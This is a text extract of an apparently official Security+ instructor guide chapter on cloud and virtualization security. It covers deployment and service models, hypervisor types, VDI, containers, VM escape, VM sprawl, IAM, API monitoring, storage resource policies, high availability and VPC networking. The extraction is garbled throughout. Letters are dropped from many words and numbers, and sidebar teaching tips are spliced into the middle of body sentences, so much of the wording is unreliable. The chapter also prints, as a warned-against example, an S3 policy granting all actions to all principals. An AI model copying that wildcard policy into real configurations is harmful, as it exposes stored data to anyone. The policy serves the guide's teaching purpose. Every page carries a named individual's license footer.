Summarize Secure Cloud and
Virtualization Services

Teaching EXAM OBJECTIVES COVERED

Tip 2.2 Summarize virtualization and cloud computing concepts
This topic provides
an overview of the
technologies and goals
In a traditional infrastructure, an attacker may find intrusions to be difficult as the
of cloud computing
and considers some of network can be isolated from the outside world. In a cloud environment, the attacker
the security impacts. may simply need to have an Internet connection and a dictionary of stolen password
The basic principles hashes or SSH keys to cause a breach. A lack of oversight in the security procedures of
of cloud models cloud providers can dramatically increase the risk an organization takes. As a security
and virtualization professional, you must be able to assess the threats and vulnerabilities associated with
technologies should
be familiar from A+
cloud service and delivery models, plus the virtualization technologies that underpin
and Network+, so them.
focus on security
implications.
Cloud Deployment Models
Show Slide(s)
A cloud deployment model classifies how the service is owned and provisioned. It is
important to recogni e the di erent impacts deployment models have on threats and
Cloud Deployment vulnerabilities. Cloud deployment models can be broadly categorized as follows:
Models
• Public (or multi-tenant) a service o ered over the Internet by cloud service
Teaching providers (CSPs) to cloud consumers. ith this model, businesses can o er
Tip subscriptions or pay as you go financing, while at the same time providing
Students need to be lower-tier services free of charge. As a shared resource, there are risks regarding
able to distinguish performance and security. Multi-cloud architectures are where an organization
cloud provider models uses services from multiple CSPs.
(private versus public,
for instance) and the • Hosted Private—hosted by a third-party for the exclusive use of the organization.
features and uses of
This is more secure and can guarantee a better level of performance but is
the di erent aa
implementations. correspondingly more expensive.

• Private—cloud infrastructure that is completely private to and owned by the

organization. In this case, there is likely to be one business unit dedicated to
managing the cloud while other business units make use of it. With private cloud
computing, organizations can exercise greater control over the privacy and security
of their services. This type of delivery method is geared more toward banking and
governmental services that require strict access control in their operations.

This type of cloud could be on premise or o site relative to the other business
units. An onsite link can obviously deliver better performance and is less likely to
be subject to outages (loss of an Internet link, for instance). On the other hand, a
dedicated o site facility may provide better shared access for multiple users in
di erent locations.

• Community—this is where several organizations share the costs of either a hosted

private or fully private cloud. This is usually done in order to pool resources for a
common concern, like standardization and security policies.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 409

There will also be cloud computing solutions that implement some sort of hybrid
public private community hosted onsite o site solution. or e ample, a travel
organization may run a sales website for most of the year using a private cloud
but break out the solution to a public cloud at times when much higher utilization
is forecast.
le ibility is a key advantage of cloud computing, but the implications for data risk
must be well understood when moving data between private and public storage
environments.

Cloud Service Models Show Slide(s)

As well as the ownership model (public, private, hybrid, or community), cloud services Cloud Service Models
are often di erentiated on the level of comple ity and pre configuration provided.
These models are referred to as something or anything as a service (XaaS). The three
most common implementations are infrastructure, software, and platform.

Infrastructure as a Service
Infrastructure as a service (IaaS) is a means of provisioning IT resources such as
servers, load balancers, and storage area network (SAN) components quickly. Rather
than purchase these components and the Internet links they require, you rent them on
an as-needed basis from the service provider's data center. Examples include Amazon
Elastic Compute Cloud (aws.amazon.com/ec2), Microsoft Azure Virtual Machines
(azure.microsoft.com/services/virtual-machines), Oracle Cloud (oracle.com/cloud), and
OpenStack (openstack.org).

Software as a Service
Software as a service (SaaS) is a di erent model of provisioning software
applications. Rather than purchasing software licenses for a given number of seats,
a business would access software hosted on a supplier's servers on a pay-as-you-
go or lease arrangement (on-demand). Virtual infrastructure allows developers to
provision on-demand applications much more quickly than previously. The applications
can be developed and tested in the cloud without the need to test and deploy on
client computers. amples include Microsoft ffice microsoft.com/en-us/
microsoft enterprise), Salesforce (salesforce.com), and Google G Suite (gsuite.
google.com).

Platform as a Service
Platform as a service (PaaS) provides resources somewhere between SaaS and IaaS.
A typical PaaS solution would provide servers and storage network infrastructure
(as per IaaS) but also provide a multi-tier web application/database platform on top.
This platform could be based on Oracle or MS SQL or PHP and MySQL. Examples
include Oracle Database (oracle.com/database), Microsoft Azure SQL Database (azure.
microsoft.com/services/sql-database), and Google App Engine (cloud.google.com/
appengine).
As distinct from aa though, this platform would not be configured to actually
do anything. Your own developers would have to create the software (the CRM or
e-commerce application) that runs using the platform. The service provider would
be responsible for the integrity and availability of the platform components, but you
would be responsible for the security of the application you created on the platform.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 410 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Dashboard for Amazon Web Services Elastic Compute Cloud (EC2) IaaS/PaaS.
(Screenshot used with permission from Amazon.com.)

Show Slide(s) Anything as a Service

Anything as a Service
There are many other e amples of aa , re ecting the idea that anything can be
provisioned as a cloud service. or e ample, database as a service and network as a
Teaching service can be distinguished as more specific types of platform as a service. The key
Tip security consideration with all these models is identifying where responsibilities lie.
We've chosen to This is often referred to as security in the cloud versus security of the cloud. Security
treat this content in the cloud is the things you must take responsibility for; security of the cloud is the
example in terms things the CSP manages. These responsibilities vary according to the service type:
of the responsibility
matrix. Wikipedia has Responsibility IaaS PaaS SaaS
a comprehensive list if
IAM You You You (using CSP toolset)
the students want to
go acronym hunting Data security (CIA You You You/CSP/Both
(en.wikipedia.org/wiki/ attributes/backup)
As_a_service).
The acronym list does
Data privacy You/CSP/Both You/CSP/Both You/CSP/Both
reference monitoring Application code/ You You CSP
as a service, so there configuration
is a glossary entry for
that. irtual network firewall You You/CSP CSP
Middleware (database) You CSP CSP
code configuration
Virtual Guest OS You CSP CSP
Virtualization layer CSP CSP CSP
Hardware layer (compute, CSP CSP CSP
storage, networking)

ote that this matrix identifies generic responsibilities only. Specific terms must be set out in
a contract and service level agreement (SLA) with the CSP.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 411

Security as a Service Show Slide(s)

The breadth of technologies re uiring specialist security knowledge and configuration Security as a Service
makes it likely that companies will need to depend on third-party support at some
point. You can classify such support in three general "tiers":
• Consultants—the experience and perspective of a third-party professional can
be hugely useful in improving security awareness and capabilities in any type of
organization (small to large). Consultants could be used for "big picture" framework
analysis and alignment or for more specific or product focused pro ects pen
testing, SIEM rollout, and so on). It is also fairly simple to control costs when using
consultants if they are used to develop capabilities rather than implement them.
here consultants come to own the security function, it can be difficult to change
or sever the relationship.

• Managed Security Services Provider (MSSP)—a means of fully outsourcing

responsibility for information assurance to a third party. This type of solution is
e pensive but can be a good fit for an M that has e perienced rapid growth and
has no in-house security capability. Of course, this type of outsourcing places a huge
amount of trust in the M . Maintaining e ective oversight of the M re uires
a good degree of internal security awareness and expertise. There could also be
significant challenges in industries e posed to high degrees of regulation in terms of
information processing.

• Security as a Service (SECaaS) can mean lots of di erent things, but is typically
distinguished from an MSSP as being a means of implementing a particular security
control, such as virus scanning or SIEM-like functionality, in the cloud. Typically,
there would be a connector to the cloud service installed locally. or e ample, an
antivirus agent would scan files locally but be managed and updated from the
cloud provider; similarly a log collector would submit events to the cloud service
for aggregation and correlation. amples include Cloud are cloud are.com saas),
Mandiant ire ye fireeye.com mandiant managed detection and response.html),
and SonicWall (sonicwall.com/solutions/service-provider/security-as-a-service .

Virtualization Technologies and Hypervisor Types Show Slide(s)

Virtualization means that multiple operating systems can be installed and run Virtualization
simultaneously on a single computer. A virtual platform requires at least three Technologies and
components: Hypervisor Types
• Host hardware—the platform that will host the virtual environment. Optionally,
Teaching
there may be multiple hosts networked together.
Tip
• Hypervisor/Virtual Machine Monitor (VMM)—manages the virtual machine This is a recap of the
environment and facilitates interaction with the computer hardware and network. basics. Hopefully
students should know
• Guest operating systems, Virtual Machines (VM), or instances—operating systems this material already.
installed under the virtual environment.

One basic distinction that can be made between virtual platforms is between host
and bare metal methods of interacting with the host hardware. In a guest OS (or
host-based) system, the hypervisor application (known as a Type II hypervisor) is itself
installed onto a host operating system. Examples of host-based hypervisors include
VMware Workstation, Oracle Virtual Box, and Parallels Workstation. The hypervisor
software must support the host OS.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 412 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Guest OS virtualization (Type II hypervisor) The hypervisor is an application running within

a native OS, and guest OSes are installed within the hypervisor.

A bare metal virtual platform means that the hypervisor (Type I hypervisor) is installed
directly onto the computer and manages access to the host hardware without going
through a host OS. Examples include VMware ESXi Server, Microsoft's Hyper-V, and
Citrix's XEN Server. The hardware needs only support the base system requirements
for the hypervisor plus resources for the type and number of guest OSes that will
be installed.

Type I bare metal hypervisor The hypervisor is installed directly on the host hardware along with
a management application, then s are installed within the hypervisor.

Show Slide(s) Virtual Desktop Infrastructure and Thin Clients

Virtual Desktop
Virtual desktop infrastructure (VDI) refers to using a VM as a means of provisioning
Infrastructure and corporate desktops. In a typical VDI, desktop computers are replaced by low-spec,
Thin Clients low-power thin client computers. When the thin client starts, it boots a minimal OS,
allowing the user to log on to a VM stored on the company server infrastructure.
The user makes a connection to the VM using some sort of remote desktop protocol

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 413

Microsoft emote Desktop or Citri ICA, for instance . The thin client has to find the
correct image and use an appropriate authentication mechanism. There may be a 1:1
mapping based on machine name or I address or the process of finding an image may
be handled by a connection broker.
All application processing and data storage in the virtual desktop environment
(VDE) or workspace is performed by the server. The thin client computer must only
be powerful enough to display the screen image, play audio, and transfer mouse, key
commands and video, and audio information over the network. All data is stored on
the server, so it is easier to back up and the desktop VMs are easier to support and
troubleshoot. They are better "locked" against unsecure user practices because any
changes to the VM can easily be overwritten from the template image. With VDI, it is
also easier for a company to completely o oad their IT infrastructure to a third party
services company.
The main disadvantage is that in the event of a failure in the server and network
infrastructure, users have no local processing ability, so downtime events may be more
costly in terms of lost productivity.

Application Virtualization and Container Virtualization Show Slide(s)

Application virtualization is a more limited type of VDI. Rather than run the whole Application
client desktop as a virtual platform, the client either accesses an application hosted on Virtualization
a server or streams the application from the server to the client for local processing. and Container
Most application virtualization solutions are based on Citrix XenApp (formerly Virtualization
Meta rame resentation erver , though Microsoft has developed an App product
with its Windows Server range and VMware has the ThinApp product. These solution
types are now often used with TML remote desktop apps, referred to as clientless
because users can access them through ordinary web browser software.
Application cell/container virtualization dispenses with the idea of a hypervisor and
instead enforces resource separation at the operating system level. The defines
isolated "cells" for each user instance to run in. Each cell or container is allocated CPU
and memory resources, but the processes all run through the native OS kernel. These
containers may run slightly di erent distributions but cannot run guest es of
di erent types you could not run indows or buntu in a ed at Linu container, for
instance). Alternatively, the containers might run separate application processes, in
which case the variables and libraries required by the application process are added to
the container.
One of the best-known container virtualization products is Docker (docker.com).
Containerization underpins many cloud services. In particular it supports microservices
and serverless architecture. Containerization is also being widely used to implement
corporate workspaces on mobile devices.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 414 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s)

VM Escape Protection Comparison of VMs versus containers.

Teaching
Tip VM Escape Protection
One of the main
concerns is that VM escaping refers to malware running on a guest OS jumping to another guest
the technology or to the host. To do this, the malware must identify that it is running in a virtual
underpinning the environment, which is usually simple to do. One means of doing so is through a timing
virtual platform attack. The classic timing attack is to send multiple usernames to an authentication
will not be well server and measure the server response times. An invalid username will usually
understood by
be rejected very quickly, but a valid one will take longer (while the authentication
developers and
administrators. server checks the password). This allows the attacker to harvest valid usernames.
Details of the Malware can use a timing attack within a guest OS to detect whether it is running in
implementation may a VM (certain operations may take a distinct amount of time compared to a "real"
also be proprietary. environment). There are numerous other "signatures" that an attacker could use to
This might be a detect the presence of virtualized system hardware. The next step in VM escaping is for
good opportunity to
discuss Meltdown and
the attacker to compromise the hypervisor. Security researchers have been focusing on
Spectre (csoonline. this type of exploit and several vulnerabilities have been found in popular hypervisors.
com article
One serious implication of VM escaping is where virtualization is used for hosted
spectre-and-
meltdown-explained- applications. If you have a hosted web server, apart from trusting the hosting provider
what-they-are-how- with your data, you have no idea what other applications might be running in other
they-work-whats- customers' Ms. or e ample, consider a scenario where you have an e commerce web
at-risk.html). These server installed on a virtual server leased from an ISP. If a third-party installs another
vulnerabilities guest OS with malware that can subvert the virtual server's hypervisor, they might
aren't specific to
hypervisors, but
be able to gain access to your server or to data held in the memory of the physical
they are particularly server. Having compromised the hypervisor, they could make a copy of your server
serious in a virtualized image and download it to any location. This would allow the attacker to steal any
environment. You can unencrypted data held on the e-commerce server. Even worse, it could conceivably
also point students to allow them to steal encrypted data, by obtaining the private encryption keys stored on
the following analysis the server or by sniffing unencrypted data or a data encryption key from the physical
of a typical VM escape
vulnerability: mcafee.
server's memory.
com/blogs/other- It is imperative to monitor security bulletins for the hypervisor software that you
blogs/mcafee-labs/
operate and to install patches and updates promptly. You should also design the
analyzing-patch-of-
a-virtual-machine- M architecture carefully so that the placement of Ms running di erent types of
escape-on-vmware. applications with di erent security re uirements does not raise unnecessary risks.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 415

Preventing VM escaping is dependent on the virtualization vendor identifying security

vulnerabilities in the hypervisor and on these being patched. The impact of VM
escaping can be reduced by using e ective service design and network placement
when deploying VMs.

Collapsing zones to virtualized devices This configuration is highly vulnerable to

a VM escaping attack. (Images © 123RF.com.)

or e ample, when considering security ones such as a DM , Ms providing front end

and middleware back end services should be separated to di erent physical hosts.
This reduces the security implications of a M escaping attack on a host in the DM
(which will generally be more vulnerable to such attacks).

Isolating s in different zones on separate hardware This should reduce the impact
of a VM escaping attack. (Images © 123RF.com.)

VM Sprawl Avoidance Show Slide(s)

As well as securing the hypervisor, you must also treat each VM as you would any VM Sprawl Avoidance
other network host. This means using security policies and controls to ensure the
confidentiality, integrity, and availability of all data and services relying on host
virtualization.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 416 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Each VM needs to be installed with its own security software suite to protect against
malware and intrusion attempts. Each guest must also have a patch management
process. This might mean installing updates locally or replacing the guest instance from
an updated VM template image.

Ordinary antivirus software installed on the host will OT detect viruses infecting the guest
OS. Scanning the virtual disks of guest OSes from the host will cause serious performance
problems.

Although one of the primary benefits of virtuali ation is the ease of deploying new
systems, this type of system sprawl and deployment of undocumented assets can also
be the root of security issues. It will often be the case that a system will be brought up
for "just a minute" to test something, but languish for months or years, undocumented,
unsecured, and unpatched. Each of these undocumented systems could represent an
exploitable vulnerability. They increase the potential attack surface of the network.
Policies and procedures for tracking, securing, and, when no longer used, destroying
virtualized assets should be put in place and carefully enforced.
Virtual machine life cycle management (VMLM) software can be deployed to enforce
VM sprawl avoidance. VMLM solutions provide you with a centralized dashboard for
maintaining and monitoring all the virtual environments in your organization. More
generally, the management procedures for developing and deploying machine images
need to be tightly drafted and monitored. VMs should conform to an application-
specific template with the minimum configuration needed to run that application
(that is, not running unnecessary services). Images should not be run in any sort of
environment where they could be infected by malware or have any sort of malicious
code inserted. One of the biggest concerns here is of rogue developers or contractors
installing backdoors or "logic bombs" within a machine image. The problem of criminal
or disgruntled sta is obviously one that a ects any sort of security environment, but
concealing code within VM machine images is a bit easier to accomplish and has the
potential to be much more destructive.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 417

Review Activity:
Secure Cloud and Virtualization Services

Answer the following questions:

1. What is meant by a public cloud?

A solution hosted by a third party cloud service provider (CSP) and shared between
subscribers (multi-tenant). This sort of cloud solution has the greatest security
concerns.

2. What type of cloud solution would be used to implement a SAN?

This would usually be described as Infrastructure as a Service (IaaS).

3. What is a Type II hypervisor?

Software that manages virtual machines that has been installed to a guest OS. This is in
contrast to a Type I (or "bare metal") hypervisor, which interfaces directly with the host
hardware.

4. What is a VDE?

A Virtual Desktop Environment (VDE) is the workspace presented when accessing an

instance in a virtual desktop infrastructure (VDI) solution. VDI is the whole solution
(host server and virtualization platform, connection protocols, connection/session
broker, and client access devices).

5. What is the risk from a VM escaping attack?

VM escaping refers to attacking other guest OSes or the hypervisor or host from within
a virtual machine. Attacks may be to steal information, perform Denial of Service (DoS),
infect the system with malware, and so on.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 418 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 15B
Apply Cloud Security Solutions

Teaching EXAM OBJECTIVES COVERED

Tip 1. Given a scenario, analyze potential indicators to determine the type of attack (Cloud-
based versus on-premises only)
This topic focuses
2.2 Summarize virtualization and cloud computing concepts
on ob ective . , but
.6 Given a scenario, apply cybersecurity solutions to the cloud
does also cover some
content from 2.2
(resource policies and Configuring cloud security solutions shares many principles and processes with on
transit gateways), and premises security, but plenty of unfamiliar technologies and challenges too. Weak
1.2 (attack indicators).
configuration of cloud services can make many attack vectors available, and the public
nature of clouds means that they will quickly be discovered and exploited. You must
be able to apply policies technical controls to provision compute, network, and storage
cloud resources with the attributes of confidentiality, integrity, and availability.

Show Slide(s) Cloud Security Integration and Auditing

Cloud Security
Cloud-based services must be integrated within regular security policies and
Integration and procedures and audited for compliance. Where indicators of on-premises attacks are
Auditing found in local application logs and network traffic, indicators of cloud based attacks are
found in API logs and metrics. The same correlation to suspicious IP address ranges
Teaching and domains and suspicious code strings must be made, but the source of this data is
Tip the cloud service provider (CSP). Accessing this auditing information in real time may
Discuss how on- be difficult, depending on the cloud service type. There are many cloud based I M
premises monitoring solutions that can perform this collection, aggregation, and correlation of security data
and auditing can be from both on-premises and cloud-based networks and instances.
extended to detect
and prevent attacks As with any contracted service, cloud computing is a means of transferring risk. As such,
in the cloud without it is imperative to identify precisely which risks you are transferring, to identify which
having to provision responsibilities the service provider is undertaking, and to identify which responsibilities
separate dashboards
and reporting.
remain with you. This should be set out in a service level agreement (SLA) with a
responsibility matri . or e ample, in an aa solution, the provider may be responsible
for the confidentiality, integrity, and availability of the software. They would be responsible
for configuring a fault tolerant, clustered server service for firewalling the servers and
creating proper authentication, authorization, and accounting procedures; for scanning for
intrusions and monitoring network logs, applying OS and software patches; and so on. You
might or might not be responsible for some or all of the software management functions,
though—ensuring that administrators and users practice good password management,
configuring system privileges, making backups of data, and so on.
Where critical tasks are the responsibility of the service provider, you should try
to ensure that there is a reporting mechanism to show that these tasks are being
completed, that their disaster recovery plans are e ective, and so on.
Another proviso is that your company is likely to still be directly liable for serious
security breaches; if customer data is stolen, for instance, or if your hosted website
is hacked and used to distribute malware. You still have liability for legal and
regulatory requirements. You might be able to sue the service provider for damages,
but your company would still be the point of investigation. You may also need to
consider the legal implications of using a cloud provider if its servers are located in a
di erent country.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 419

You must also consider the risk of insider threat, where the insiders are administrators
working for the service provider. ithout e ective security mechanisms such as
separation of duties and M of N control, it is highly likely that they would be able to
gain privileged access to your data. Consequently, the service provider must be able
to demonstrate to your satisfaction that they are prevented from doing so. There is
also the risk described earlier that your data is in proximity to other, unknown virtual
servers and that some sort of attack could be launched on your data from another
virtual server.

The Twitter hack affecting high-profile accounts being hi acked for a bitcoin scam is a good
illustration of the risks from insider threat (scmagazine.com home security-news insider-
threats twitter-hack-is-a-reminder-of-the-dangers-of-unfettered-employee-access).

As with any contracted service, with any aa solution, you place a large amount of
trust in the service provider. The more important the service is to your business, the
more risk you are investing in that trust relationship.

Cloud Security Controls Show Slide(s)

Clouds use the same types of security controls as on-premises networks, including Cloud Security
identity and access management (IAM), endpoint protection (for virtual instances), Controls
resource policies to govern access to data and services, firewalls to filter traffic
between hosts, and logging to provide an audit function. Teaching
Tip
Most CSP's will provide these security controls as native functionality of the cloud
Highlight the
platform. oogle's firewall service is an e ample of this type of cloud native control
similarities to on-
(cloud.google.com firewalls . The controls can be deployed and configured using premises security
either the CSP's web console, or programmatically via a command line interface (CLI) tasks.
or application programming interface (API). A third-party solution would typically be
installed as a virtual instance within the cloud. or e ample, you might prefer to run
a third party ne t generation firewall. This can be configured as an appliance and
deployed to the cloud. The virtual network architecture can be defined so that this
appliance instance is able to inspect traffic and apply policies to it, either by routing
the traffic through the instance or by using some type of bridging or mirroring. As an
e ample, consider the configuration guide for the arracuda ne t gen firewall campus.
barracuda.com product cloudgenfirewall doc overview).
The same considerations can be made for other types of security controls—notably
data loss prevention and compliance management. Cloud native controls might
not exist for these use cases, they might not meet the functional requirements that
third party solutions can, and there may be too steep a transition in terms of change
management and skills development.

Application Security and IAM

Application security in the cloud refers both to the software development process and
to identity and access management (IAM) features designed to ensure authorized use
of applications.
Just as with on-premises solutions, cloud-based IAM enables the creation of user and
user security groups, plus role-based management of privileges.

Secrets Management
A cloud service is highly vulnerable to remote access. A failure of credential
management is likely to be exploited by malicious actors. You must enforce strong
authentication policies to mitigate risks:
• Do not use the root user for the CSP account for any day-to-day logon activity.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 420 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• e uire strong multifactor authentication M A for interactive logons. se

conditional authentication to deny or warn of risky account activity.

• Principals—user accounts, security groups, roles, and services—can interact

with cloud services via CLIs and APIs. Such programmatic access is enabled by
assigning a secret key to the account. Only the secret key (not the ordinary account
credential) can be used for programmatic access. When a secret key is generated
for an account, it must immediately be transferred to the host and kept securely on
that host.

Show Slide(s) Cloud Compute Security

Cloud Compute
Cloud provides resources abstracted from physical hardware via one or more layers
Security of virtualization. The compute component provides process and system memory
(RAM) resource as required for a particular workload. The workload could be a virtual
Teaching machine instance configured with four C s and AM or it could be a container
Tip instance spun up to perform a function and return a result within a given timeframe.
Generally, container The virtualization layer ensures that the resources required for this task are made
security will be the available on-demand. This can be referred to as dynamic resource allocation. It will be
responsibility of the the responsibility of the CSP to ensure this capability is met to the standards agreed in
CSP, unless operating the SLA.
a private cloud, while
API use counts as Within the compute component, the following critical security considerations can be
security in the cloud. identified.

Container Security
A container uses many shared components on the underlying platform, meaning it
must be carefully configured to reduce the risk of data e posure. In a container engine
such as Docker, each container is isolated from others through separate namespaces
and control groups (docs.docker.com/engine/security/security). Namespaces prevent
one container reading or writing processes in another, while control groups ensure
that one container cannot overwhelm others in a DoS-type attack.

API Inspection and Integration

The API is the means by which consumers interact with the cloud infrastructure,
platform, or application. The consumer may use direct API calls, or may use a CSP-
supplied web console as a graphical interface for the API. Monitoring API usage
gives warning if the system is becoming overloaded (ensuring availability) and allows
detection of unauthorized usage or attempted usage.
• Number of requests—this basic load metric counts number of requests per
second or requests per minute. Depending on the service type, you might be able
to establish baselines for typical usage and set thresholds for alerting abnormal
usage. An unexplained spike in API calls could be an indicator of a DDoS attack, for
instance.

• Latency—this is the time in milliseconds (ms) taken for the service to respond to an
A I call. This can be measured for specific services or as an aggregate value across
all services. igh latency usually means that compute resources are insufficient. The
cause of this could be genuine load or DDoS, however.

• Error rates—this measures the number of errors as a percentage of total calls,

usually classifying error types under category headings. Errors may represent an
overloaded system if the API is unresponsive, or a security issue, if the errors are
authorization/access denied types.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 421

• Unauthorized and suspicious endpoints—connections to the API can be managed in

the same sort of way as remote access. The client endpoint initiating the connection
can be restricted using an ACL and the endpoint's IP address monitored for
geographic location.

Instance Awareness
As with on-premises virtualization, it is important to manage instances (virtual
machines and containers) to avoid sprawl, where undocumented instances are
launched and left unmanaged. As well as restricting rights to launch instances, you
should configure logging and monitoring to track usage.

Cloud Storage Security Show Slide(s)

Where the compute component refers to CPU and system memory resources, the Cloud Storage Security
storage component means the provisioning of peristent storage capacity. As with the
compute component, the cloud virtualization layer abstracts the underlying hardware Teaching
to provide the required storage type, such as a virtual hard disk for a VM instance, Tip
ob ect based storage to serve static files in a web application, or block storage for use Make sure students
by a database server. torage profiles will have di erent performance characteristics can recognize a JSON
for di erent applications, such as fast D backed storage for databases versus slower format resource
HDD-backed media for archiving. The principal performance metric is the number of policy.
input/output operations per second (IOPS) supported.

Permissions and Resource Policies

As with on premises systems, cloud storage resources must be configured to allow
reads and/or writes only from authorized endpoints. In the cloud, a resource policy
acts as the ACL for an object. In a resource policy, permissions statements are typically
written as a Java cript b ect Notation J N strings. Misconfiguration of these
resource policies is a widely e ploited attack vector. or e ample, the following policy
uses the any wildcard to assign both actions read and write and principals
(accounts) to a storage object. The type of policy breaks the principle of least privilege
and is highly unsecure:
"Statement": [ {
"Action": [
"*"
],
"Effect": "Allow",
"Principal": "*",
"Resource": "arn:aws:s3:::515support-courses-
data/*"
} ]
Encryption
Cloud storage encryption equates to the on-premises concept of full disk encryption
D . The purpose is to minimi e the risk of data loss via an insider or intruder attack
on the CSP's storage systems. Each storage unit is encrypted using an AES key. If an
attacker were to physically access a data center and copy or remove a disk, the data on
the disk would not be readable.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 422 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

To read or write the data, the AES key must be available to the VM or container using
the storage object. With CSP-managed keys, the cloud provider handles this process
by using the access control rights configured on the storage resource to determine
whether access is approved and, if so, making the key available to the VM or container.
The key will be stored in a hardware security module (HSM) within the cloud. The HSM
and separation of duties policies protect the keys from insider threat. Alternatively,
customers can manage keys themselves, taking on all responsibility for secure
distribution and storage.
ncryption can also be applied at other levels. or e ample, applications can selectively
encrypt file system ob ects or use database level encryption to encrypt fields and or
records. All networking—whether customer to cloud or between VMs/containers within
the cloud—should use encrypted protocols such as HTTPS or IPSec.

Show Slide(s) High Availability

ne of the benefits of the cloud is the potential for providing services that are resilient
High Availability
to failures at di erent levels, such as component, server, local network, site, data
Teaching center, and wide area network. The CSP uses a virtualization layer to ensure that
Tip compute, storage, and network provision meet the availability criteria set out in its
SLA. In terms of storage performance tiers, high availability (HA) refers to storage
Note that we will
return to availability provisioned with a guarantee of . uptime or better. As with on premises
in the lesson on architecture, the CSP uses redundancy to make multiple disk controllers and storage
cybersecurity devices available to a pool of storage resource. Data may be replicated between pools
resiliency. or groups, with each pool supported by separate hardware resources.

Replication
Data replication allows businesses to copy data to where it can be utilized most
e ectively. The cloud may be used as a central storage area, making data available
among all business units. Data replication requires low latency network connections,
security, and data integrity. C s o er several data storage performance tiers
(cloud.google.com/storage/docs/storage-classes). The terms hot and cold storage
refer to how quickly data is retrieved. Hot storage retrieves data more quickly than
cold, but the uicker the data retrieval, the higher the cost. Di erent applications have
diverse replication requirements. A database generally needs low-latency, synchronous
replication, as a transaction often cannot be considered complete until it has been
made on all replicas. A mechanism to replicate data files to backup storage might not
have such high requirements, depending on the criticality of the data.

High Availability across Zones

CSPs divide the world into regions. Each region is independent of the others. The
regions are divided into availability zones. The availability zones have independent data
centers with their own power, cooling, and network connectivity. You can choose to
host data, services, and VM instances in a particular region to provide a lower latency
service to customers. Provisioning resources in multiple zones and regions can also
improve performance and increases redundancy, but requires an adequate level of
replication performance.
Conse uently, C s o er several tiers of replication representing di erent high
availability service levels:
• Local replication—replicates your data within a single data center in the region
where you created your storage account. The replicas are often in separate fault
domains and upgrade domains.

• Regional replication (also called zone-redundant storage)—replicates your data

across multiple data centers within one or two regions. This safeguards data and
access in the event a single data center is destroyed or goes o ine.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 423

• Geo-redundant storage (GRS)—replicates your data to a secondary region that is

distant from the primary region. This safeguards data in the event of a regional
outage or a disaster.

Cloud Networking Security Show Slide(s)

Within the cloud, the CSP establishes a virtualization layer that abstracts the underlying Cloud Networking
physical network. This allows the CSP to operate a public cloud where the networking Security
performed by each customer account is isolated from the others. In terms of customer-
configured cloud networking, there are various conte ts Teaching
Tip
• Networks by which the cloud consumer operates and manages the cloud systems.
Note that VPC is
• Virtual networks established between VMs and containers within the cloud. synonymous with
virtual network.
• Virtual networks by which cloud services are published to guests or customers on
the Internet.

Virtual Private Clouds (VPCs)

Each customer can create one or more virtual private clouds (VPCs) attached to their
account. By default, a VPC is isolated from other CSP accounts and from other VPCs
operating in the same account. This means that customer A cannot view traffic passing
over customer B's VPC. The workload for each VPC is isolated from other VPCs. Within
the C, the cloud consumer can assign an I v CID block and configure one or more
subnets within that block. ptionally, an I v CID block can be assigned also.

The following notes focus on features of networking in AWS. Other vendors support similar
functionality, though sometimes with different terminology. or example, in icrosoft Azure,
VPCs are referred to as virtual networks.

Public and Private Subnets

ach subnet within a C can either be private or public. To configure a public subnet,
first an Internet gateway virtual router must be attached to the C configuration.
econdly, the Internet gateway must be configured as the default route for each
public subnet. If a default route is not configured, the subnet remains private, even
if an Internet gateway is attached to the VPC. Each instance in the subnet must also
